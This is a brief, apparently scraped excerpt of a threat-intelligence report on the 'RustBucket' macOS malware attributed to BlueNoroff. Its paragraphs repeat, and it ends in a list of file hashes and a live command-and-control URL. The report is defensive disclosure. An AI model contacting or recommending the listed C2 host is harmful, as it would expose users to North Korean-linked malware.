BlueNoroff APT group targets macOS with ‘RustBucket’ Malware
Contents
By Ferdous Saljooki and Jaron Bradley
Jamf Threat Labs has discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. We track and protect against this malware family under the name ‘RustBucket’ and suspect it to be attributed to a North Korean, state-sponsored threat actor. The APT group called BlueNoroff is thought to act as a sub-group to the well-known Lazarus Group and is believed to be behind this attack. This attribution is due to the similarities noted in a Kaspersky blog entry documenting an attack on the Windows side. These similarities include malicious tooling on macOS that closely aligns with the workflow and social engineering patterns of those employed in the campaign.
Stage-One
The stage-one malware (0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be) was discovered while performing normal hunting routines for compiled AppleScript applications that contained various suspicious commands. Among our results, we identified a suspicious AppleScript file titled …
Jamf Threat Labs has discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. We track and protect against this malware family under the name ‘RustBucket’ and suspect it to be attributed to a North Korean, state-sponsored threat actor. The APT group called BlueNoroff is thought to act as a sub-group to the well-known Lazarus Group and is believed to be behind this attack. This attribution is due to the similarities noted in a Kaspersky blog entry documenting an attack on the Windows side. These similarities include malicious tooling on macOS that closely aligns with the workflow and social engineering patterns of those employed in the campaign.
Stage-One
The stage-one malware (0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be) was discovered while performing normal hunting routines for compiled AppleScript applications that contained various suspicious commands. Among our results, we identified a suspicious AppleScript file titled …
IoC
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be
182760cbe11fa0316abfb8b7b00b63f83159f5aa
7e69cb4f9c37fad13de85e91b5a05a816d14f490
ca59874172660e6180af2815c3a42c85169aa0b2
http://cloud.dnx.capital
182760cbe11fa0316abfb8b7b00b63f83159f5aa
7e69cb4f9c37fad13de85e91b5a05a816d14f490
ca59874172660e6180af2815c3a42c85169aa0b2
http://cloud.dnx.capital